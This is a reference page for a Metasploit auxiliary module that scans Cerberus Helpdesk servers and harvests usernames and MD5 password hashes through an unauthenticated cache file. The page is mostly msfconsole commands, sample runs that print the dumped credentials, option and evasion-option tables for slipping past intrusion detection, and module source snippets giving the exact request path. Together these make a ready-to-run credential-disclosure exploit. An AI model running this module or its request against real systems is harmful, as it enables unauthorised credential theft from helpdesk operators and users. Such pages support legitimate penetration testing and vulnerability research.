Cerberus Helpdesk User Hash Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/cerberus_helpdesk_hash_disclosure metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cerberus Helpdesk User Hash Disclosure
Module: auxiliary/gather/cerberus_helpdesk_hash_disclosure
Source code: modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb
Disclosure date: 2016-03-07
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

This module extracts usernames and password hashes from the Cerberus Helpdesk through an unauthenticated access to a workers file. Verified on Version 4.2.3 Stable (Build 925) and 5.4.4

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
msf auxiliary(cerberus_helpdesk_hash_disclosure) > show options
    ... show and set options ...
msf auxiliary(cerberus_helpdesk_hash_disclosure) > set RHOSTS ip-range
msf auxiliary(cerberus_helpdesk_hash_disclosure) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(cerberus_helpdesk_hash_disclosure) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(cerberus_helpdesk_hash_disclosure) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(cerberus_helpdesk_hash_disclosure) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


This module opens a devblocks_cache---ch_workers or zend_cache---ch_workers file which contains a data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.

Vulnerable Application


This module has been verified against the following Cerberus Helpdesk versions:

  1. Version 4.2.3 Stable (Build 925)
  2. Version 5.4.4

However it may also work up to, but not including, version 6.7

Version 5.4.4 is available on exploit-db.com

  • of note, 5.4.4 has to be installed on a PRE php7 environment.

Verification Steps


  1. Start msfconsole
  2. use auxiliary/gather/cerberus_helpdesk_hash_disclosure
  3. set rhosts [rhosts]
  4. run

Scenarios


4.2.3 using zend (not verbose)

    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
    rhosts => 1.1.1.1
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run

    [-] Invalid response received for 1.1.1.1    for /storage/tmp/devblocks_cache---ch_workers
    [+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
    [+] Found: example:112302c209fe8d73f502c132a3da2b1c
    [+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7

    Cerberus Helpdesk User Credentials
    ==================================

     Username                     Password Hash
     --------                     -------------
     admin                        aaa34a6111abf0bd1b1c4d7cd7ebb37b
     example                      112302c209fe8d73f502c132a3da2b1c
     foobar                       0d108d09e5bbe40aade3de5c81e9e9c7

    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

5.4.4 using devblocks

    msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
    rhosts => 192.168.2.45
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
    targeturi => /cerb5/
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
    verbose => true
    msf auxiliary(cerberus_helpdesk_hash_disclosure) > run

    [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
    [+] Found: [email protected]:37b51d194a7513e45b56f6524f2d51f2
    [+] Found: [email protected]:acbd18db4cc2f85cedef654fccc4a4d8
    [+] Found: [email protected]:18126e7bd3f84b3f3e4df094def5b7de

    Cerberus Helpdesk User Credentials
    ==================================

     Username                     Password Hash
     --------                     -------------
     [email protected]                 37b51d194a7513e45b56f6524f2d51f2
     [email protected]                 acbd18db4cc2f85cedef654fccc4a4d8
     [email protected]            18126e7bd3f84b3f3e4df094def5b7de

    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the gather/cerberus_helpdesk_hash_disclosure auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/cerberus_helpdesk_hash_disclosure

msf6 auxiliary(gather/cerberus_helpdesk_hash_disclosure) > show info

       Name: Cerberus Helpdesk User Hash Disclosure
     Module: auxiliary/gather/cerberus_helpdesk_hash_disclosure
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2016-03-07

Provided by:
  asdizzle_
  h00die

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                no        URL of the Cerberus Helpdesk root
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  This module extracts usernames and password hashes from the Cerberus 
  Helpdesk through an unauthenticated access to a workers file. 
  Verified on Version 4.2.3 Stable (Build 925) and 5.4.4

References:
  https://www.exploit-db.com/exploits/39526

Module Options


This is a complete list of options available in the gather/cerberus_helpdesk_hash_disclosure auxiliary module:

msf6 auxiliary(gather/cerberus_helpdesk_hash_disclosure) > show options

Module options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URL of the Cerberus Helpdesk root
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/cerberus_helpdesk_hash_disclosure auxiliary module:

msf6 auxiliary(gather/cerberus_helpdesk_hash_disclosure) > show advanced

Module advanced options (auxiliary/gather/cerberus_helpdesk_hash_disclosure):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/cerberus_helpdesk_hash_disclosure module can do:

msf6 auxiliary(gather/cerberus_helpdesk_hash_disclosure) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/cerberus_helpdesk_hash_disclosure auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/cerberus_helpdesk_hash_disclosure) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> Unable to connect to <URL>


Here is a relevant code snippet related to the "<PEER> Unable to connect to <URL>" error message:

40:	      ['devblocks', 'zend'].each do |site|
41:	        url = normalize_uri(datastore['TARGETURI'], 'storage', 'tmp', "#{site}_cache---ch_workers")
42:	        vprint_status("Attempting to load data from #{url}")
43:	        res = send_request_cgi({'uri' => url})
44:	        if !res
45:	          print_error("#{peer} Unable to connect to #{url}")
46:	          next
47:	        end
48:	
49:	        if !res.body.include?('pass')
50:	          print_error("Invalid response received for #{peer} for #{url}")

Invalid response received for <PEER> for <URL>


Here is a relevant code snippet related to the "Invalid response received for <PEER> for <URL>" error message:

45:	          print_error("#{peer} Unable to connect to #{url}")
46:	          next
47:	        end
48:	
49:	        if !res.body.include?('pass')
50:	          print_error("Invalid response received for #{peer} for #{url}")
51:	          next
52:	        end
53:	
54:	        cred_table = Rex::Text::Table.new 'Header'  => 'Cerberus Helpdesk User Credentials',
55:	                                          'Indent'  => 1,

<PEER> Unable to connect to site


Here is a relevant code snippet related to the "<PEER> Unable to connect to site" error message:

76:	        print_line
77:	        print_line cred_table.to_s
78:	        break
79:	      end
80:	
81:	    rescue ::Rex::ConnectionError
82:	      print_error("#{peer} Unable to connect to site")
83:	      return
84:	    end
85:	  end
86:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • asdizzle_
  • h00die

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.